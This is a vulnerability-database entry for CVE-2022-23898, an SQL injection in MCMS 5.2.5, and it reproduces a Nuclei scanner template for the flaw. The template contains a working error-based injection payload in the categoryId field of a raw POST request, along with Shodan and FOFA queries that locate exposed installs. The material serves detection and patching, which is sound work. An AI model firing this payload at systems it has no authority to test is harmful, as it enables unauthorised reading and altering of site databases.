Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-23898
HistoryMar 30, 2023 - 5:06 p.m.

MCMS 5.2.5 - SQL Injection

2023-03-3017:06:37
ProjectDiscovery
github.com
3
vulnerability
injection
sql
mcms
mingsoft
cve-2022-23898
critical

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.017

Percentile

88.2%

MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-23898

info:
  name: MCMS 5.2.5 - SQL Injection
  author: Co5mos
  severity: critical
  description: |
    MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5.
  reference:
    - https://github.com/ming-soft/MCMS/issues/62
    - https://github.com/advisories/GHSA-p94q-9q2m-pfh2
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23898
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-23898
    cwe-id: CWE-89
    epss-score: 0.0161
    epss-percentile: 0.87425
    cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mingsoft
    product: mcms
    shodan-query:
      - http.favicon.hash:1464851260
      - http.favicon.hash:"1464851260"
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2022,sqli,mcms,mingsoft
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /cms/content/list HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        categoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz

    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fdb25'
# digest: 4b0a00483046022100cc5553508244fcbe287318d8d8a5ea2a38052fc42f3ede3701b2172ced02d55d022100ac511822ab5128a9f658641fa3504f6fa7a0e5bd43b00e23b720713c3487330b:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.017

Percentile

88.2%

Related for NUCLEI:CVE-2022-23898